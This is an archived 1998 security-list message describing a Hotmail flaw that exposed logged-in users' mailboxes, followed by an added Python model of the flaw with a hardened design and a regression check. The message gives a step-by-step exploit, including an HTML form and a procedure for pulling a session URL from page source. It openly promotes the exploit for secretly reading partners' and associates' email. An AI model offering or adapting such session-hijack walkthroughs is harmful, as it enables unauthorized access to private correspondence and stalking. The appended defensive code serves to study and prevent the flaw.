[ http://www.rootshell.com/ ]

From administrator@airmail.net Fri Jul 24 16:37:22 1998
Date: Fri, 24 Jul 1998 02:57:00 -0500
From: Security Administrator - kM <administrator@airmail.net>
Reply-To: km@hackersclub.com
To: www-request@rootshell.com
Subject: Hotmail E-Mail Reading exploit

Although someone submitted this to me, it was incomplete and really didn't explain this new hotmail exploit all that well. I cannot take full credit for it but I just want to make it more publicly known.

Basically you can read anyone who owns a hotmail account that either forgets to logout or is currently logged in reading email.

Basically here is how it works..

If you want to get into a hotmail account first you need to find a victim. Everyone has a hotmail account especially peeps on IRC or any local chat channel hangout. Send an email to them and tell them to check their hotmail account. Then type their name below and access their email at the same time.

Good for checking up on cheating girlfriends, boyfriends, wives, husbands. Business associates etc etc.

Step 1

Enter the hotmail ID you want to hack. (remember this) this hack attempt ONLY works if the user has not LOGGED out of hotmail. If the user has logged out this attempt will not be successful and you will get a message saying you were logged out.

Type in their user name here

    <FORM method="post" action="http://www.hotmail.com/cgi-bin/password.cgi">
    Type in their user name here
    <INPUT type="text" name="login" size="16" maxlength="16">
    <INPUT type=submit value="enter">
    <INPUT type="hidden" name="curmbox" value="active">
    </FORM>

Make sure you have typed the username exactly right because hotmail will not tell you if you have typed it incorrectly, they also log the IPs of people entering incorrect login names.

Step 2

It is now time to view the html source code of the password page that you are on now. View the source for this page.

Five lines down or so from the top of the source code page, it will say

    <FORM name="passwordform" Action="http://somenumber/cgi-bin//start/username/anothernumber" method="POST" target="_top">

Step 3

Go to the address in the action part of this code.

    http://somenumber/cgi-bin//start/username/anothernumber

If the hotmail user didn't logout, you will have access to their mailbox. If they logged out try another.

If you like, I have set up a website with a more user-friendly interface.

http://www.hackersclub.com/km/library/hack/hotmail_hack.html

kM
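
The flaw described in the message above comes down to a session address that the unauthenticated password page reveals for any login name. As an added example (not part of the original message and not Hotmail's code), the Python model below puts that behaviour beside a hardened design and includes a check a defender can run against either; the class names, paths and account are constructed assumptions.

```python
import hmac
import secrets

USERS = {"alice": "correct horse"}  # constructed account, not real data

def password_ok(user, password):
    # Unknown users fail outright; known users get a constant-time compare.
    return user in USERS and hmac.compare_digest(
        USERS[user].encode(), password.encode())

class LeakySite:
    """Model of the behaviour in the post: the session lives in a URL that
    the unauthenticated password page prints for any login name."""
    def __init__(self):
        self.active = {}  # login -> session number
    def login(self, user, password):
        if password_ok(user, password):
            self.active[user] = 1 + secrets.randbelow(10**9)
    def password_page(self, user):
        n = self.active.get(user, 0)
        return f'<FORM Action="/cgi-bin/start/{user}/{n}" method="POST">'

class HardenedSite:
    """Session is an unguessable token handed only to the client that
    proved the password; pre-auth pages never mention it."""
    def __init__(self):
        self.sessions = {}  # token -> login
    def login(self, user, password):
        if not password_ok(user, password):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = user
        return token  # would be sent as a cookie in the login response
    def password_page(self, user):
        return '<FORM Action="/cgi-bin/login" method="POST">'
    def mailbox_allowed(self, user, token):
        return token is not None and self.sessions.get(token) == user
    def logout(self, token):
        self.sessions.pop(token, None)

def preauth_page_leaks(site, user, password):
    """True if the password page changes once `user` has a live session,
    meaning it discloses session state to a client that never logged in."""
    before = site.password_page(user)
    site.login(user, password)
    return site.password_page(user) != before
```

`preauth_page_leaks` works as a regression check: any page served before authentication should be byte-identical whether or not the named account has a live session.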